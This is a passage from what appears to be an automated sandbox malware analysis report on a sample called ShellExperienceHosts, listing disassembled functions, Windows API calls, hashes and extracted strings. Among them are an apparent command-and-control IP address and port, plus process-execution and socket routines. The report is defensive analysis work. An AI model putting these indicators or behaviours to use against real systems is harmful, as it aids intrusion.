                                                                            • Opcode Fuzzy Hash: 2695536ff9b25a0f9fc0009b4d2545807ab405ab4c8e27f413d420dcc7cbb1d4
                                                                            • Instruction Fuzzy Hash: 74012C74D002099FCF50DFB499846EEBFF9EB08300F5445A9E559E3241EB359A40CB61
                                                                            APIs
                                                                            • __EH_prolog3.LIBCMT ref: 6C7EA917
                                                                              • Part of subcall function 6C80E632: EnterCriticalSection.KERNEL32(6C8F4FC8,?,?,?,?,6C7A17E8,00000010,00000008,6C75C8E2,6C75C9AC,6C73EE4E,6C75FACA,?,6C73D391), ref: 6C80E663
                                                                              • Part of subcall function 6C80E632: InitializeCriticalSection.KERNEL32(00000000,?,?,?,?,6C7A17E8,00000010,00000008,6C75C8E2,6C75C9AC,6C73EE4E,6C75FACA,?,6C73D391), ref: 6C80E679
                                                                              • Part of subcall function 6C80E632: LeaveCriticalSection.KERNEL32(6C8F4FC8,?,?,?,?,6C7A17E8,00000010,00000008,6C75C8E2,6C75C9AC,6C73EE4E,6C75FACA,?,6C73D391), ref: 6C80E687
                                                                              • Part of subcall function 6C80E632: EnterCriticalSection.KERNEL32(00000000,?,?,?,6C7A17E8,00000010,00000008,6C75C8E2,6C75C9AC,6C73EE4E,6C75FACA,?,6C73D391), ref: 6C80E694
                                                                            • GetProfileIntW.KERNEL32(windows,DragMinDist,00000002), ref: 6C7EA96A
                                                                            • GetProfileIntW.KERNEL32(windows,DragDelay,000000C8), ref: 6C7EA980
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection$EnterProfile$H_prolog3InitializeLeave
                                                                            • String ID: DragDelay$DragMinDist$windows
                                                                            • API String ID: 3965097884-2101198082
                                                                            • Opcode ID: 8a8e69e64d54b29d5c63e6884407b1f7db860df806c41d4f6047c27c1f9be198
                                                                            • Instruction ID: 7b2e73fc1ac92bfdcb85fb81d858bd3652edd92665c86498b2c60268c818a10b
                                                                            • Opcode Fuzzy Hash: 8a8e69e64d54b29d5c63e6884407b1f7db860df806c41d4f6047c27c1f9be198
                                                                            • Instruction Fuzzy Hash: 7C014CB0A007009FDB719FB89B49B0A7AF4BB89709F542D2EE095C7B80E7749405CF44
                                                                            APIs
                                                                            • ___set_flsgetvalue.LIBCMT ref: 100071BC
                                                                              • Part of subcall function 10009754: TlsGetValue.KERNEL32(00000000,100098AD,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F,00000000,00000000), ref: 1000975D
                                                                              • Part of subcall function 10009754: DecodePointer.KERNEL32(?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F,00000000,00000000,?,100099BA,0000000D), ref: 1000976F
                                                                              • Part of subcall function 10009754: TlsSetValue.KERNEL32(00000000,?,10009FB0,00000000,00000001,00000000,?,1000C0CF,00000018,10017C70,0000000C,1000C15F,00000000,00000000,?,100099BA), ref: 1000977E
                                                                            • ___fls_getvalue@4.LIBCMT ref: 100071C7
                                                                              • Part of subcall function 10009734: TlsGetValue.KERNEL32(?,?,100071CC,00000000), ref: 10009742
                                                                            • ___fls_setvalue@8.LIBCMT ref: 100071DA
                                                                              • Part of subcall function 10009788: DecodePointer.KERNEL32(?,?,?,100071DF,00000000,?,00000000), ref: 10009799
                                                                            • GetLastError.KERNEL32(00000000,?,00000000), ref: 100071E3
                                                                            • ExitThread.KERNEL32 ref: 100071EA
                                                                            • GetCurrentThreadId.KERNEL32 ref: 100071F0
                                                                            • __freefls@4.LIBCMT ref: 10007210
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                            • String ID:
                                                                            • API String ID: 2383549826-0
                                                                            • Opcode ID: 9534965ccca21370a2365faca07fc43a5bbbcb8b41f594eb418147c089430495
                                                                            • Instruction ID: 9ef8d05c11a244158b1ee883055881acaa61a2209176cdde4bb0df2a080a06ba
                                                                            • Opcode Fuzzy Hash: 9534965ccca21370a2365faca07fc43a5bbbcb8b41f594eb418147c089430495
                                                                            • Instruction Fuzzy Hash: 7EF09679404240ABF304DFB5C94988E7BA9FF482C4725C458F90C8B21BDB39E8428790
                                                                            APIs
                                                                            • ___set_flsgetvalue.LIBCMT ref: 0332F9CA
                                                                              • Part of subcall function 03333CA0: TlsGetValue.KERNEL32(00000000,03333DF9,?,03334500,00000000,00000001,00000000,?,03338DE6,00000018,03346448,0000000C,03338E76,00000000,00000000), ref: 03333CA9
                                                                              • Part of subcall function 03333CA0: DecodePointer.KERNEL32(?,03334500,00000000,00000001,00000000,?,03338DE6,00000018,03346448,0000000C,03338E76,00000000,00000000,?,03333F06,0000000D), ref: 03333CBB
                                                                              • Part of subcall function 03333CA0: TlsSetValue.KERNEL32(00000000,?,03334500,00000000,00000001,00000000,?,03338DE6,00000018,03346448,0000000C,03338E76,00000000,00000000,?,03333F06), ref: 03333CCA
                                                                            • ___fls_getvalue@4.LIBCMT ref: 0332F9D5
                                                                              • Part of subcall function 03333C80: TlsGetValue.KERNEL32(?,?,0332F9DA,00000000), ref: 03333C8E
                                                                            • ___fls_setvalue@8.LIBCMT ref: 0332F9E8
                                                                              • Part of subcall function 03333CD4: DecodePointer.KERNEL32(?,?,?,0332F9ED,00000000,?,00000000), ref: 03333CE5
                                                                            • GetLastError.KERNEL32(00000000,?,00000000), ref: 0332F9F1
                                                                            • ExitThread.KERNEL32 ref: 0332F9F8
                                                                            • GetCurrentThreadId.KERNEL32 ref: 0332F9FE
                                                                            • __freefls@4.LIBCMT ref: 0332FA1E
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                            • Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                            • String ID:
                                                                            • API String ID: 2383549826-0
                                                                            • Opcode ID: 5bd88a527e9dc645eecfcba04124b2a5f19a3ef71d69438899e5e5347d37e66f
                                                                            • Instruction ID: b6519ad705a32c3f79bce4fa9c2731609880ebd76a045a60ac150e0f0b48437e
                                                                            • Opcode Fuzzy Hash: 5bd88a527e9dc645eecfcba04124b2a5f19a3ef71d69438899e5e5347d37e66f
                                                                            • Instruction Fuzzy Hash: CAF0497CA00710ABC708FF61C9C881E7FACAF8A250721C558E9099B211DB34E442CBA1
                                                                            APIs
                                                                              • Part of subcall function 6C873543: CreateFileW.KERNEL32(?,00000000,?,6C8731E7,?,?,00000000,?,6C8731E7,?,0000000C), ref: 6C873560
                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C873252
                                                                            • GetFileType.KERNEL32(00000000), ref: 6C873265
                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C87326F
                                                                            • CloseHandle.KERNEL32(00000000), ref: 6C873298
                                                                            • CloseHandle.KERNEL32(6C86A23C), ref: 6C8733E5
                                                                            • GetLastError.KERNEL32 ref: 6C873417
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$CloseFileHandle$CreateType
                                                                            • String ID:
                                                                            • API String ID: 3086256261-0
                                                                            • Opcode ID: c6c607367b8531938f379ccc30d35d9e8b6114e9f318495f2fb57cf3cf133533
                                                                            • Instruction ID: 4a0194b36405ba8b1b3556e39fd04f2b5abc5d86981e6e8f4eb1cb16f295aaa9
                                                                            • Opcode Fuzzy Hash: c6c607367b8531938f379ccc30d35d9e8b6114e9f318495f2fb57cf3cf133533
                                                                            • Instruction Fuzzy Hash: E3A13732A042589FCF39CF68DD41BAD3BB0AB07328F14056DE8119B790DB359D16CBA2
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: _strlen
                                                                            • String ID: 118.107.44.112$18852$IP=$Port=
                                                                            • API String ID: 4218353326-2395760147
                                                                            • Opcode ID: cf433627e59b37c0c44fa95c63a9d32e8be188ec3980bdb7daca868c3ac69d66
                                                                            • Instruction ID: d91d27950aabd67815fece574203c156ebe3d12686fe34b338159bad33ebeee5
                                                                            • Opcode Fuzzy Hash: cf433627e59b37c0c44fa95c63a9d32e8be188ec3980bdb7daca868c3ac69d66
                                                                            • Instruction Fuzzy Hash: 39F1C6B2A01B408BD334CF38C884A97B7F6BF99308F154A2ED49687B51E731F5458B95
                                                                            APIs
                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 100032F1
                                                                            • Sleep.KERNEL32(00000258), ref: 100032FE
                                                                            • InterlockedExchange.KERNEL32(?,00000000), ref: 10003306
                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 10003312
                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1000331A
                                                                            • Sleep.KERNEL32(0000012C), ref: 1000332B
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: ObjectSingleWait$Sleep$ExchangeInterlocked
                                                                            • String ID:
                                                                            • API String ID: 3137405945-0
                                                                            • Opcode ID: 90501a451cf47964b750dce1617d56ac3a73a9eb1c931f81fede124cf76ff774
                                                                            • Instruction ID: f89297930b1253133b9af3f62c08b225611c8876bcc0692efb07df5bac526d50
                                                                            • Opcode Fuzzy Hash: 90501a451cf47964b750dce1617d56ac3a73a9eb1c931f81fede124cf76ff774
                                                                            • Instruction Fuzzy Hash: 65F08971104314AFD610DBE9CCC4D46F3B8AF89331B144709F221872D0CAB1E8018BA0
                                                                            APIs
                                                                            • CoInitialize.OLE32(00000000), ref: 0332669B
                                                                            • CoCreateInstance.OLE32(033446FC,00000000,00000001,0334471C,?,?,?,?,?,?,?,?,?,?,0332588A), ref: 033266B2
                                                                            • SysFreeString.OLEAUT32(?), ref: 0332674C
                                                                            • CoUninitialize.OLE32(?,?,?,?,?,?,?,?,?,0332588A), ref: 0332677D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                            • Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: CreateFreeInitializeInstanceStringUninitialize
                                                                            • String ID: FriendlyName
                                                                            • API String ID: 841178590-3623505368
                                                                            • Opcode ID: 69985a83d91823ebd5a704dec740f8f03bddefadfcef2e00411aaba72a1d4ece
                                                                            • Instruction ID: 4381652be6d85b7686f46d3dea7160d21f1f0731a6596df684e17ef328c9fac9
                                                                            • Opcode Fuzzy Hash: 69985a83d91823ebd5a704dec740f8f03bddefadfcef2e00411aaba72a1d4ece
                                                                            • Instruction Fuzzy Hash: AE311879600609AFDB00DB99DCC1EAEB7B9EF88704F148598F514EB254DBB1E9428B60
                                                                            APIs
                                                                            • _malloc.LIBCMT ref: 0332F721
                                                                              • Part of subcall function 0332F673: __FF_MSGBANNER.LIBCMT ref: 0332F68C
                                                                              • Part of subcall function 0332F673: __NMSG_WRITE.LIBCMT ref: 0332F693
                                                                              • Part of subcall function 0332F673: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,03334500,00000000,00000001,00000000,?,03338DE6,00000018,03346448,0000000C,03338E76), ref: 0332F6B8
                                                                            • std::exception::exception.LIBCMT ref: 0332F756
                                                                            • std::exception::exception.LIBCMT ref: 0332F770
                                                                            • __CxxThrowException@8.LIBCMT ref: 0332F781
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                            • Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                            • String ID: bad allocation
                                                                            • API String ID: 615853336-2104205924
                                                                            • Opcode ID: d5cb300ecb92f75b9039ae2532fbf16bd5fd5c616d89dee8a8b8621a5a8da8e4
                                                                            • Instruction ID: b19cc6414b0d436386bdd7b60fd37c51d3c7f7dc4e4d188db5869755311db5c5
                                                                            • Opcode Fuzzy Hash: d5cb300ecb92f75b9039ae2532fbf16bd5fd5c616d89dee8a8b8621a5a8da8e4
                                                                            • Instruction Fuzzy Hash: D1F0F478D007296ECB00FB58DCE1A9F7FB8EB42644F180159F414EA191DFB0EA008B80
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 655357848afafb581d5b29f9a0bf869acc7293993279c4a47d2306c6889564e5
                                                                            • Instruction ID: 7688814a8805d53468d07a257064164e74ab8c02b4a1a89a17c9876b5aecaca5
                                                                            • Opcode Fuzzy Hash: 655357848afafb581d5b29f9a0bf869acc7293993279c4a47d2306c6889564e5
                                                                            • Instruction Fuzzy Hash: 68B1F870A04249EFDB21CF9ED940BADBBB1BF4A318F24856AE41097B41C7B1D941CB60
                                                                            APIs
                                                                            • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 10002D3C
                                                                            • CancelIo.KERNEL32(?), ref: 10002D46
                                                                            • InterlockedExchange.KERNEL32(00000000,00000000), ref: 10002D4F
                                                                            • closesocket.WS2_32(?), ref: 10002D59
                                                                            • SetEvent.KERNEL32(00000001), ref: 10002D63
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544434335.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544407079.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544475349.0000000010015000.00000002.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544504109.0000000010019000.00000004.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544535867.000000001001F000.00000020.00001000.00020000.00000000.sdmp
                                                                            • Associated: 00000003.00000002.3544594293.0000000010021000.00000002.00001000.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
                                                                            • String ID:
                                                                            • API String ID: 1486965892-0
                                                                            • Opcode ID: 2ceef8d7a9cb16c2b8d4c923c9bd50e46f51888a66d7a8a6949057e86b5d425b
                                                                            • Instruction ID: c3dd280d0a222891198d8956340d5cd90ea8efbda93af296f9b36197db09124c
                                                                            • Opcode Fuzzy Hash: 2ceef8d7a9cb16c2b8d4c923c9bd50e46f51888a66d7a8a6949057e86b5d425b
                                                                            • Instruction Fuzzy Hash: 95F04F75100710EFE320DF94CC89F5677B8FB49B12F148659F6829B690C7B1F9048BA0
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: __fread_nolock
                                                                            • String ID: tJe$uJe
                                                                            • API String ID: 2638373210-462319029
                                                                            • Opcode ID: c4af98d67da0a3c8fd554ba3fb9f8cdcfea8f2bc5c8ebc8302512543f3d9c1ec
                                                                            • Instruction ID: 41d0d365e4fa65a5b23156ab4815a5cf6b27d61896e1de866520470defd5f718
                                                                            • Opcode Fuzzy Hash: c4af98d67da0a3c8fd554ba3fb9f8cdcfea8f2bc5c8ebc8302512543f3d9c1ec
                                                                            • Instruction Fuzzy Hash: 13120375609740DFC765CF18C280A5ABBE1AB89308F104DAEF899DB761E731EC54CB86
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(Shell32,?,?,6C6DC052,MFCApplication4.AppID.NoVersion), ref: 6C76DD0C
                                                                            • GetProcAddress.KERNEL32(00000000,SetCurrentProcessExplicitAppUserModelID), ref: 6C76DD1D
                                                                            Strings
                                                                            • Shell32, xrefs: 6C76DD05
                                                                            • SetCurrentProcessExplicitAppUserModelID, xrefs: 6C76DD17
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: AddressHandleModuleProc
                                                                            • String ID: SetCurrentProcessExplicitAppUserModelID$Shell32
                                                                            • API String ID: 1646373207-2658420654
                                                                            • Opcode ID: 6dbecd5333bf814639877ad07e892dbbf0897ab691bee479a7b10e528d3117bb
                                                                            • Instruction ID: 32b464e2631d01a066f38231555aa69402c3504e82c58137f98a61bcc8091958
                                                                            • Opcode Fuzzy Hash: 6dbecd5333bf814639877ad07e892dbbf0897ab691bee479a7b10e528d3117bb
                                                                            • Instruction Fuzzy Hash: 55E0DF32701711278A256B22D91CC1B3B28DB927A5311083AF905C2B00CF74EC00C6E8
                                                                            APIs
                                                                            • WinExec.KERNEL32(?,00000000), ref: 6C6D042C
                                                                            • Sleep.KERNEL32(00007530), ref: 6C6D0437
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: ExecSleep
                                                                            • String ID:
                                                                            • API String ID: 1384635584-0
                                                                            • Opcode ID: f83e87d17ca9021aeb58e603c6fedcfe3c09d9c216189f47be7e1c9295983ed5
                                                                            • Instruction ID: 8af0f8cca66bf3045b537cb5de317a523770f026b13d140b3200e8641eeda6ee
                                                                            • Opcode Fuzzy Hash: f83e87d17ca9021aeb58e603c6fedcfe3c09d9c216189f47be7e1c9295983ed5
                                                                            • Instruction Fuzzy Hash: 62F1BB33E150A44BDB2CCB28CC947ED7A63AF85318F1A47A9D41AE7781DB31ADC48785
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: _strlen$Sleep
                                                                            • String ID:
                                                                            • API String ID: 2737124692-0
                                                                            • Opcode ID: 590ebc41968ab6d2d078e7150094bde84ddb16cac153010f0b373df2e6168d34
                                                                            • Instruction ID: 4c1226b6d44b2ecaa26cab0cebaac9ed663363225d7e58d93f2af4bbce0cb67b
                                                                            • Opcode Fuzzy Hash: 590ebc41968ab6d2d078e7150094bde84ddb16cac153010f0b373df2e6168d34
                                                                            • Instruction Fuzzy Hash: CF7176B2C052189BCB10CF74DC447DEBBB6AF09318F164735E808A7B81E735AA488799
                                                                            APIs
                                                                            • VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003,00000001,6C8F39F0,?), ref: 6C741335
                                                                            • VerSetConditionMask.KERNEL32(00000000), ref: 6C74133D
                                                                            • VerifyVersionInfoW.KERNEL32(0000011C,00000003,00000000), ref: 6C74134E
                                                                            • GetSystemMetrics.USER32(00001000), ref: 6C74135F
                                                                              • Part of subcall function 6C741395: __EH_prolog3.LIBCMT ref: 6C74139C
